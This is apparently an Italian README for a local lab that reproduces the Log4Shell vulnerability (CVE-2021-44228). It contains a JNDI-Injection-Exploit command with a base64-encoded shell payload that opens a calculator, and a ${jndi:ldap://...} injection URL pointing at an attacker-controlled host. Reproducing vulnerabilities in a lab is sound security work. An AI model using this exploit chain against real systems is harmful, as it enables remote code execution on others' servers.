
CVE-2021-44228 Ambiente di riproduzione della vulnerabilità
Dopo l'avvio del progetto, visitare: http://127.0.0.1:9090/vul
Versione JDK: java8u92 (evitare di usare una versione troppo alta; si consiglia di usare la mia stessa versione, poiché le versioni più alte hanno alcune limitazioni sull'iniezione JNDI)
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1
Utilizzare lo strumento sopra indicato per generare il PAYLOAD.
Visitare http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}